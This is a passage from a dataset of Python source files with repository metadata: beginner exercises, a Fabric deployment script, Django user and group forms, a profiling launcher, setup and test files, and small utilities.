] | 1 | 2021-05-31T14:47:53.000Z | 2021-05-31T14:47:53.000Z | number = int(input())
if number == 1:
print("Monday")
elif number == 2:
print("Tuesday")
elif number == 3:
print("Wednesday")
elif number == 4:
print("Thursday")
elif number == 5:
print("Friday")
elif number == 6:
print("Saturday")
elif number == 7:
print("Sunday")
else:
print("Error") | 18.666667 | 23 | 0.559524 | 41 | 336 | 4.585366 | 0.536585 | 0.319149 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02834 | 0.264881 | 336 | 18 | 24 | 18.666667 | 0.732794 | 0 | 0 | 0 | 0 | 0 | 0.171875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.470588 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
bf65ea943def807250a2417b19ed661c9d41c5bf | 377 | py | Python | Mundo 1/ex002.py | judigunkel/judi-exercicios-python | c61bb75b1ae6141defcf42214194e141a70af15d | [
"MIT"
] | null | null | null | Mundo 1/ex002.py | judigunkel/judi-exercicios-python | c61bb75b1ae6141defcf42214194e141a70af15d | [
"MIT"
] | null | null | null | Mundo 1/ex002.py | judigunkel/judi-exercicios-python | c61bb75b1ae6141defcf42214194e141a70af15d | [
"MIT"
] | 1 | 2021-03-06T02:41:36.000Z | 2021-03-06T02:41:36.000Z | """
Faça um programa que leia o nome de uma pessoa e mostre uma mensagem de boas-
vindas
"""
nome = input('Digite seu nome: ') # perguntando ao usuário
# usando format:
print('É um prazer te conhecer, {}{}{}!'.format('\033[4;34m', nome, '\033[m'))
# usando f strings:
print(f'É um prazer te conhecer, \033[4;34m{nome}\033[m!')
# o nome vai aparecer sublinhado e na cor roxa
| 29 | 78 | 0.679045 | 65 | 377 | 3.938462 | 0.615385 | 0.039063 | 0.070313 | 0.085938 | 0.265625 | 0.117188 | 0 | 0 | 0 | 0 | 0 | 0.057325 | 0.167109 | 377 | 12 | 79 | 31.416667 | 0.757962 | 0.493369 | 0 | 0 | 0 | 0 | 0.627778 | 0.127778 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
bf77219984bd898368969d24dff7019402837592 | 1,159 | py | Python | fabfile.py | webadmin87/midnight | b60b3b257b4d633550b82a692f3ea3756c62a0a9 | [
"BSD-3-Clause"
] | 1 | 2015-11-20T12:42:39.000Z | 2015-11-20T12:42:39.000Z | fabfile.py | webadmin87/midnight | b60b3b257b4d633550b82a692f3ea3756c62a0a9 | [
"BSD-3-Clause"
] | 3 | 2020-02-11T21:21:12.000Z | 2021-06-10T17:23:56.000Z | fabfile.py | webadmin87/midnight | b60b3b257b4d633550b82a692f3ea3756c62a0a9 | [
"BSD-3-Clause"
] | 1 | 2015-11-04T09:23:31.000Z | 2015-11-04T09:23:31.000Z | from fabric.api import *
from contextlib import contextmanager
env.hosts = ['host_name']
env.user = 'user_name'
env.keyfile = ['$HOME/.ssh/private_key']
env.directory = '/path/to/project'
env.activate = 'source /path/to/virtualenv/bin/activate'
env.uwsgi_pid = '/tmp/project_name.pid'
env.target_env = 'prod'
@contextmanager
def virtualenv():
with cd(env.directory):
with prefix(env.activate):
yield
def pull_data():
with virtualenv():
run('git pull origin master')
run('cp -f midnight/env/%s/settings_local.py midnight/settings_local.py' % env.target_env)
def pip_install():
with virtualenv():
run('pip install -e .')
def bower_install():
with virtualenv():
run('bower install')
def collect_static():
with virtualenv():
run('./manage.py collectstatic --noinput')
def migrate():
with virtualenv():
run('./manage.py migrate')
def reload_uwsgi():
run('uwsgi --reload '+env.uwsgi_pid)
def deploy():
execute(pull_data)
execute(pip_install)
execute(bower_install)
execute(collect_static)
execute(migrate)
execute(reload_uwsgi)
| 20.333333 | 98 | 0.663503 | 147 | 1,159 | 5.095238 | 0.408163 | 0.093458 | 0.113485 | 0.064085 | 0.066756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197584 | 1,159 | 56 | 99 | 20.696429 | 0.805376 | 0 | 0 | 0.128205 | 0 | 0 | 0.264021 | 0.115617 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | true | 0 | 0.051282 | 0 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bf8a699bf52b2b69a5bc0c7d94d9e3e334724f8e | 7,950 | py | Python | sysvet/apps/usuario/forms.py | joseiba/SysVetSoft | d1ed13799a5086c880bc45dd153d78bb3a629c7d | [
"Apache-2.0"
] | null | null | null | sysvet/apps/usuario/forms.py | joseiba/SysVetSoft | d1ed13799a5086c880bc45dd153d78bb3a629c7d | [
"Apache-2.0"
] | null | null | null | sysvet/apps/usuario/forms.py | joseiba/SysVetSoft | d1ed13799a5086c880bc45dd153d78bb3a629c7d | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.forms import AuthenticationForm, UserCreationForm, UserChangeForm, PasswordChangeForm
from django.contrib.auth.models import Group, Permission
from django.forms import *
from django import forms
from apps.usuario.models import User
class FormLogin(AuthenticationForm):
def __init__(self, *args, **kwargs):
super(FormLogin, self).__init__(*args, **kwargs)
self.fields['username'].widget.attrs['class'] = 'input100'
self.fields['username'].widget.attrs['placeholder'] = 'Nombre de usuario'
self.fields['password'].widget.attrs['class'] = 'input100'
self.fields['password'].widget.attrs['placeholder'] = 'Contraseña'
class UserForm(UserCreationForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['password1'].widget.attrs['class'] = 'form-control'
self.fields['password2'].widget.attrs['class'] = 'form-control'
self.fields['groups'].widget.attrs['class'] = 'group_select'
self.fields['groups'].widget.attrs['required'] = 'required'
self.fields['groups'].widget.attrs['style'] = 'width: 100%'
class Meta():
model = User
fiels = ("first_name", "last_name", "email", "username", "groups", "password1", "password2")
widgets = {
'first_name': forms.TextInput(
attrs={
'class': 'form-control','name': 'first_name', 'placeholder': 'Ingrese el nombre del usuario','onkeyup':'replaceDirection(this)', 'required': 'required', 'autocomplete':"off"
}
),
'last_name': forms.TextInput(
attrs={
'class': 'form-control','name': 'last_name', 'placeholder': 'Ingrese el apellido del usuario','onkeyup':'replaceDirection(this)', 'required': 'required', 'autocomplete':"off"
}
),
'email': forms.TextInput(
attrs={
'class':'form-control optional', 'placeholder': 'Email','name':'email', 'type':'email', 'id':'email', 'autocomplete':"off"
}
),
'username': forms.TextInput(
attrs={
'class': 'form-control','name': 'username', 'placeholder': 'Nombre de usuario','onkeyup':'replaceDirection(this)', 'required': 'required', 'autocomplete':"off"
}
),
}
exclude = ['user_permissions', 'last_login', 'date_joined', 'is_superuser', 'is_active', 'is_staff', 'password', 'profile']
help_texts = {
'username' : None,
'email': None,
'first_name': None,
'last_name': None,
'password1': None,
'password2': None,
}
def save(self, commit=True):
user = super().save(commit=False)
if commit:
user.save()
for grupo in self.cleaned_data['groups']:
user.groups.add(grupo)
return user
class UserFormChange(UserChangeForm):
def __init__(self, user, *args, **kwargs):
self.user = user
super().__init__(*args, **kwargs)
self.fields['groups'].widget.attrs['class'] = 'group_select'
self.fields['groups'].widget.attrs['required'] = 'required'
self.fields['groups'].widget.attrs['style'] = 'width: 100%'
for fieldname in ['username']:
self.fields[fieldname].help_text = None
try:
if not self.user.has_perms(['usuario.add_user']):
for fieldname in ['groups']:
self.fields[fieldname].widget.attrs['class'] = 'd-none'
self.fields[fieldname].label = ''
self.fields[fieldname].help_text = None
except:
pass
password = None
class Meta:
model = User
fields = ("first_name", "last_name", "email", "username", "groups")
widgets = {
'first_name': forms.TextInput(
attrs={
'class': 'form-control','name': 'first_name', 'placeholder': 'Ingrese el nombre del usuario','onkeyup':'replaceDirection(this)', 'required': 'required', 'autocomplete':"off"
}
),
'last_name': forms.TextInput(
attrs={
'class': 'form-control','name': 'last_name', 'placeholder': 'Ingrese el apellido del usuario','onkeyup':'replaceDirection(this)', 'required': 'required', 'autocomplete':"off"
}
),
'email': forms.TextInput(
attrs={
'class':'form-control optional', 'placeholder': 'Email','name':'email', 'type':'email', 'id':'email', 'autocomplete':"off"
}
),
'username': forms.TextInput(
attrs={
'class': 'form-control','name': 'username', 'placeholder': 'Nombre de usuario','onkeyup':'replaceDirection(this)', 'required': 'required', 'autocomplete':"off"
}
),
}
exclude = ['user_permissions', 'last_login', 'date_joined', 'is_superuser', 'is_active', 'is_staff', 'password','profile']
help_texts = {
'username' : None,
'email': None,
'first_name': None,
'last_name': None,
'password': None,
}
def save(self, commit=True):
form = super()
if form.is_valid():
user = form.save(commit=False)
user.groups.clear()
for grupo in self.cleaned_data['groups']:
user.groups.add(grupo)
return user
queryset = [
"user",
"producto",
"especie",
"raza",
"cliente",
"mascota",
"reserva",
"confiempresa",
"servicio",
"empleado",
"facturacompra",
"proveedor",
"pedidocabecera",
"facturacabeceraventa",
"inventario",
"tipovacuna",
"reporte"]
class GroupForm(ModelForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['permissions'].queryset = Permission.objects.filter(content_type__model__in=queryset)
class Meta:
model = Group
fields = ('name', 'permissions')
widgets = {
'name': forms.TextInput(attrs={
'class':'form-control', 'autocomplete': 'off',
}),
'permissions': forms.CheckboxSelectMultiple(),
}
class GroupChangeForm(ModelForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['permissions'].queryset = Permission.objects.filter(content_type__model__in=queryset)
class Meta:
model = Group
fields = ('name', 'permissions')
widgets = {
'name': forms.TextInput(attrs={
'class':'form-control', 'autocomplete': 'off',
}),
'permissions': forms.CheckboxSelectMultiple(),
}
class ContraseñaChangeForm(PasswordChangeForm):
def __init__(self , user, *args, **kwargs):
self.user = user
super().__init__(user, *args, **kwargs)
self.fields['old_password'].widget.attrs['class'] = 'form-control'
self.fields['new_password1'].widget.attrs['class'] = 'form-control'
self.fields['new_password2'].widget.attrs['class'] = 'form-control'
self.fields['old_password'].widget.attrs['required'] = 'required'
self.fields['new_password1'].widget.attrs['required'] = 'required'
self.fields['new_password2'].widget.attrs['required'] = 'required'
def clean_old_password(self):
"""
Validate that the old_password field is correct.
"""
old_password = self.cleaned_data["old_password"]
if not self.user.check_password(old_password):
raise ValidationError("La contraseña actual no coinciden!")
return old_password | 37.857143 | 194 | 0.562893 | 743 | 7,950 | 5.87214 | 0.193809 | 0.055008 | 0.048132 | 0.072198 | 0.725647 | 0.705478 | 0.641989 | 0.607151 | 0.557415 | 0.557415 | 0 | 0.003852 | 0.281635 | 7,950 | 210 | 195 | 37.857143 | 0.760112 | 0.006038 | 0 | 0.530726 | 0 | 0 | 0.279477 | 0.016753 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050279 | false | 0.134078 | 0.027933 | 0 | 0.156425 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
bfa3605c47fc0b3969cc4eda539cf73c379877be | 274 | py | Python | ci/scripts/run_profile.py | destin-v/dev | afc26d3b12b200c38ec99b0ecc6a483aef6ba359 | [
"MIT"
] | null | null | null | ci/scripts/run_profile.py | destin-v/dev | afc26d3b12b200c38ec99b0ecc6a483aef6ba359 | [
"MIT"
] | null | null | null | ci/scripts/run_profile.py | destin-v/dev | afc26d3b12b200c38ec99b0ecc6a483aef6ba359 | [
"MIT"
] | null | null | null | import os
# Setup the terminal size because the output file is tied to terminal sizing.
os.environ["LINES"] = "25"
os.environ["COLUMNS"] = "200"
# Profile the code. For additional options see $ scalene -h
os.system("scalene --outfile ./docs/profile.html --html main.py")
| 30.444444 | 77 | 0.718978 | 42 | 274 | 4.690476 | 0.761905 | 0.091371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021459 | 0.149635 | 274 | 8 | 78 | 34.25 | 0.824034 | 0.489051 | 0 | 0 | 0 | 0 | 0.50365 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bfb397fd775c83e67d42d42f2789867f7f37c43a | 261 | py | Python | ce_detector/__main__.py | cauliyang/ce_detector | 869275a7b3a78b9732f7d0aba4d86176708edefc | [
"MIT"
] | null | null | null | ce_detector/__main__.py | cauliyang/ce_detector | 869275a7b3a78b9732f7d0aba4d86176708edefc | [
"MIT"
] | null | null | null | ce_detector/__main__.py | cauliyang/ce_detector | 869275a7b3a78b9732f7d0aba4d86176708edefc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" script for running in the terminal
@author: YangyangLi
@contact:li002252@umn.edu
@license: MIT Licence
@file: __main__.py
@time: 2020/12/21 5:02 PM
"""
from cli import cli
if __name__ == "__main__":
cli()
| 18.642857 | 38 | 0.678161 | 40 | 261 | 4.125 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086364 | 0.157088 | 261 | 13 | 39 | 20.076923 | 0.663636 | 0.731801 | 0 | 0 | 0 | 0 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
bfb94eca076a77581409f0ec4eef08ffd2ee368f | 292 | py | Python | DQM/EcalPreshowerMonitorModule/python/ESPedestalTask_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQM/EcalPreshowerMonitorModule/python/ESPedestalTask_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQM/EcalPreshowerMonitorModule/python/ESPedestalTask_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
ecalPreshowerPedestalTask = cms.EDAnalyzer('ESPedestalTask',
LookupTable = cms.untracked.FileInPath("EventFilter/ESDigiToRaw/data/ES_lookup_table.dat"),
DigiLabel = cms.InputTag("ecalPreshowerDigis"),
OutputFile = cms.untracked.string("")
)
| 29.2 | 92 | 0.787671 | 29 | 292 | 7.862069 | 0.827586 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092466 | 292 | 9 | 93 | 32.444444 | 0.860377 | 0 | 0 | 0 | 0 | 0 | 0.274914 | 0.164948 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bfba0e033a1b883577a1e63675eab18f30855927 | 392 | py | Python | sorl/thumbnail_standalone/conf/__init__.py | kreopt/sorl-thumbnail | cbc02e642c45e6206234bcfb0562c243ecffacf7 | [
"BSD-3-Clause"
] | null | null | null | sorl/thumbnail_standalone/conf/__init__.py | kreopt/sorl-thumbnail | cbc02e642c45e6206234bcfb0562c243ecffacf7 | [
"BSD-3-Clause"
] | null | null | null | sorl/thumbnail_standalone/conf/__init__.py | kreopt/sorl-thumbnail | cbc02e642c45e6206234bcfb0562c243ecffacf7 | [
"BSD-3-Clause"
] | null | null | null | from sorl.thumbnail_standalone.lazy import LazyObject
from sorl.thumbnail_standalone.conf import defaults
class Settings(object):
pass
class LazySettings(LazyObject):
def _setup(self):
self._wrapped = Settings()
for attr in dir(defaults):
if attr == attr.upper():
setattr(self, attr, getattr(defaults, attr))
settings = LazySettings()
| 23.058824 | 60 | 0.678571 | 44 | 392 | 5.954545 | 0.590909 | 0.061069 | 0.129771 | 0.206107 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229592 | 392 | 16 | 61 | 24.5 | 0.86755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.181818 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
bfc7986a12cb6b98819b9416c8cff1e639a570c8 | 791 | py | Python | nodeconductor/structure/management/commands/init_balance_history.py | p-p-m/nodeconductor | bc702302ef65c89793452f0fd6ca9a6bec79782f | [
"Apache-2.0"
] | null | null | null | nodeconductor/structure/management/commands/init_balance_history.py | p-p-m/nodeconductor | bc702302ef65c89793452f0fd6ca9a6bec79782f | [
"Apache-2.0"
] | null | null | null | nodeconductor/structure/management/commands/init_balance_history.py | p-p-m/nodeconductor | bc702302ef65c89793452f0fd6ca9a6bec79782f | [
"Apache-2.0"
] | null | null | null | from datetime import timedelta
from django.core.management.base import BaseCommand
from django.utils import timezone
from nodeconductor.structure.models import BalanceHistory
from nodeconductor.structure.models import Customer
class Command(BaseCommand):
help = """ Initialize demo records of balance history """
def handle(self, *args, **options):
self.stdout.write('Creating demo records of balance history for all customers')
for customer in Customer.objects.all():
for i in range(10):
BalanceHistory.objects.create(customer=customer,
created=timezone.now() - timedelta(days=i),
amount=100 + i * 10)
self.stdout.write('... Done')
| 35.954545 | 89 | 0.63464 | 85 | 791 | 5.905882 | 0.564706 | 0.039841 | 0.103586 | 0.12749 | 0.258964 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012302 | 0.280657 | 791 | 21 | 90 | 37.666667 | 0.869947 | 0 | 0 | 0 | 0 | 0 | 0.139064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
bfc87c245c1b1446c2b1971de0668c9443c699a8 | 208 | py | Python | Week 1/5.py | ShruKin/Python-Assignments | f6b5d8b2e23f0d6f68d7acced43a1830c6ecebf3 | [
"MIT"
] | null | null | null | Week 1/5.py | ShruKin/Python-Assignments | f6b5d8b2e23f0d6f68d7acced43a1830c6ecebf3 | [
"MIT"
] | 1 | 2019-11-16T08:40:15.000Z | 2019-11-16T08:40:15.000Z | Week 1/5.py | ShruKin/Python-Assignments | f6b5d8b2e23f0d6f68d7acced43a1830c6ecebf3 | [
"MIT"
] | null | null | null | print("Kinjal Raykarmakar\nSec: CSE2H\tRoll: 29\n")
num = int(input("Enter a number: "))
if num % 2 == 0:
print("{} is an even number".format(num))
else:
print("{} is an odd number".format(num)) | 26 | 51 | 0.615385 | 33 | 208 | 3.878788 | 0.69697 | 0.109375 | 0.140625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029762 | 0.192308 | 208 | 8 | 52 | 26 | 0.732143 | 0 | 0 | 0 | 0 | 0 | 0.464115 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
bfc954c37a277e27749a709306aba7d412eb2924 | 615 | py | Python | setup.py | RichardScottOZ/pybedfroms | 4805823f0b25a27499c462be724d48866c261c03 | [
"BSD-3-Clause"
] | 1 | 2021-05-15T12:03:49.000Z | 2021-05-15T12:03:49.000Z | setup.py | RichardScottOZ/pybedfroms | 4805823f0b25a27499c462be724d48866c261c03 | [
"BSD-3-Clause"
] | null | null | null | setup.py | RichardScottOZ/pybedfroms | 4805823f0b25a27499c462be724d48866c261c03 | [
"BSD-3-Clause"
] | 1 | 2021-05-15T12:03:55.000Z | 2021-05-15T12:03:55.000Z | import io
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import splitext
from setuptools import setup, find_packages
setup(
name = 'pybedforms',
version = '0.0.1',
long_description = "tbd",
url='https://github.com/andrewannex/pybedforms',
author = "Andrew Annex",
author_email = "annex@jhu.edu",
license='BSD-3',
packages = find_packages('src'),
package_dir = {'': 'src'},
py_modules=[splitext(basename(path))[0] for path in glob('src/*.py')],
requires=['numpy', 'numba', 'matplotlib'],
) | 25.625 | 74 | 0.674797 | 84 | 615 | 4.869048 | 0.571429 | 0.05868 | 0.0978 | 0.156479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009901 | 0.178862 | 615 | 24 | 75 | 25.625 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.199675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.380952 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
449dbbf586feec17333bd94155ecc34ec0aee477 | 914 | py | Python | tests/test_logging.py | learnitall/foremanlite | 540688409f92d5a3caedc7e9805b0fdc02d73f03 | [
"MIT"
] | null | null | null | tests/test_logging.py | learnitall/foremanlite | 540688409f92d5a3caedc7e9805b0fdc02d73f03 | [
"MIT"
] | null | null | null | tests/test_logging.py | learnitall/foremanlite | 540688409f92d5a3caedc7e9805b0fdc02d73f03 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Test foremanlite.logging module."""
import pytest
import foremanlite.logging
pytestmark = pytest.mark.usefixtures("do_log_teardown")
def test_value_error_raised_if_file_path_not_given_for_setup():
"""Test `ValueError` raised if `file_path` is not given with `use_file`."""
with pytest.raises(ValueError):
foremanlite.logging.setup(use_file=True, file_path=None)
with pytest.raises(ValueError):
foremanlite.logging.setup(use_file=True, file_path=1) # type: ignore
foremanlite.logging.setup(use_file=False, file_path=None)
def test_get_gets_a_child_of_the_base_logger():
"""Test that `get` returns a child of the base logger."""
foremanlite.logging.setup(use_stream=True)
logger = foremanlite.logging.get("test")
assert logger.name == foremanlite.logging.BASENAME + ".test"
assert logger.hasHandlers()
| 29.483871 | 79 | 0.734136 | 125 | 914 | 5.136 | 0.448 | 0.224299 | 0.143302 | 0.161994 | 0.323988 | 0.277259 | 0.211838 | 0.211838 | 0.211838 | 0.211838 | 0 | 0.003827 | 0.142232 | 914 | 30 | 80 | 30.466667 | 0.815051 | 0.230853 | 0 | 0.142857 | 0 | 0 | 0.035037 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
44ae200982a7df36bc882c2e58aa4fb318690d98 | 437 | py | Python | nsz.py | denise-amiga/nsz | ab264c3da04a8c1e21cd67253f1519d5bec22836 | [
"MIT"
] | null | null | null | nsz.py | denise-amiga/nsz | ab264c3da04a8c1e21cd67253f1519d5bec22836 | [
"MIT"
] | null | null | null | nsz.py | denise-amiga/nsz | ab264c3da04a8c1e21cd67253f1519d5bec22836 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This is needed as multiprocessing shouldn't include nsz
# as it won't be able to optain __main__.__file__ and so crash inside Keys.py
if __name__ == '__main__':
import sys
if sys.hexversion < 0x03060000:
raise ImportError("NSZ requires at least Python 3.6!\nCurrent python version is " + sys.version)
import multiprocessing
multiprocessing.freeze_support()
import nsz
nsz.main()
| 31.214286 | 98 | 0.745995 | 65 | 437 | 4.753846 | 0.738462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03523 | 0.155606 | 437 | 13 | 99 | 33.615385 | 0.802168 | 0.400458 | 0 | 0 | 0 | 0 | 0.267442 | 0 | 0 | 0 | 0.03876 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
44afcc4387be509529e32cba753788dfccffd29e | 1,350 | py | Python | tests/sample_train_execution.py | mlspec/mlspeclib-action-docker | 2709ff39d4defc4ece07c2b3f36b5b571bab4bd2 | [
"MIT"
] | null | null | null | tests/sample_train_execution.py | mlspec/mlspeclib-action-docker | 2709ff39d4defc4ece07c2b3f36b5b571bab4bd2 | [
"MIT"
] | null | null | null | tests/sample_train_execution.py | mlspec/mlspeclib-action-docker | 2709ff39d4defc4ece07c2b3f36b5b571bab4bd2 | [
"MIT"
] | null | null | null | from mlspeclib import MLSchema, MLObject
from random import randint, random, randrange
from pathlib import Path
import uuid
results_ml_object.set_type(
schema_type=result_ml_object_schema_type, # noqa
schema_version=result_ml_object_schema_version, # noqa
)
# Mocked up results
return_dict = {
"training_execution_id": uuid.uuid4(),
"accuracy": float(f"{randrange(93000,99999)/100000}"),
"global_step": int(f"{randrange(50,150) * 100}"),
"loss": float(f"{randrange(10000,99999)/1000000}"),
}
results_ml_object.training_execution_id = return_dict["training_execution_id"]
results_ml_object.accuracy = return_dict["accuracy"]
results_ml_object.global_step = return_dict["global_step"]
results_ml_object.loss = return_dict["loss"]
# Execution metrics
results_ml_object.execution_profile.system_memory_utilization = random()
results_ml_object.execution_profile.network_traffic_in_bytes = randint(7e9, 9e10)
results_ml_object.execution_profile.gpu_temperature = randint(70, 130)
results_ml_object.execution_profile.disk_io_utilization = random()
results_ml_object.execution_profile.gpu_percent_of_time_accessing_memory = random()
results_ml_object.execution_profile.cpu_utilization = random()
results_ml_object.execution_profile.gpu_utilization = random()
results_ml_object.execution_profile.gpu_memory_allocation = random()
| 40.909091 | 83 | 0.817778 | 183 | 1,350 | 5.617486 | 0.360656 | 0.116732 | 0.189689 | 0.18677 | 0.381323 | 0.264591 | 0.195525 | 0.148833 | 0 | 0 | 0 | 0.042071 | 0.084444 | 1,350 | 32 | 84 | 42.1875 | 0.789644 | 0.033333 | 0 | 0 | 0 | 0 | 0.135385 | 0.080769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
44b58f6544668f819c00e24e877afe4af5efa544 | 261 | py | Python | weather/distanceCheck.py | huberf/PAL | 5e7d5502ad969c6ae362c292b939b1fe768678d6 | [
"MIT"
] | 1 | 2021-03-22T04:05:21.000Z | 2021-03-22T04:05:21.000Z | weather/distanceCheck.py | huberf/PAL | 5e7d5502ad969c6ae362c292b939b1fe768678d6 | [
"MIT"
